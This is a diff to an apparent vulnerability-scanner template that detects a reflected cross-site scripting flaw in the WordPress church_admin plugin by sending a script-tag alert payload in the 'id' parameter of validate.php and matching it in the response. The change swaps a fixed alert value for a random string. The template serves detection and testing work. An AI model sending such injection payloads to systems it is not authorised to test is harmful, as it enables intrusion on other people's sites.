--- a/vulnerabilities/wordpress/wp-church-admin-xss.yaml
+++ b/vulnerabilities/wordpress/wp-church-admin-xss.yaml
@@ -1,4 +1,4 @@
-id: CVE-2020-29395
+id: wp-church-admin-xss
 
 info:
   name: WordPress Plugin church_admin - 'id' Reflected Cross-Site Scripting (XSS)
@@ -10,13 +10,13 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3Cscript%3Ealert%28123%29%3C/script%3E'
+      - "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3Cscript%3Ealert%28'{{randstr}}'%29%3C/script%3E"
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "<script>alert(123)</script>"
+          - "<script>alert('{{randstr}}')</script>"
         part: body
 
       - type: word
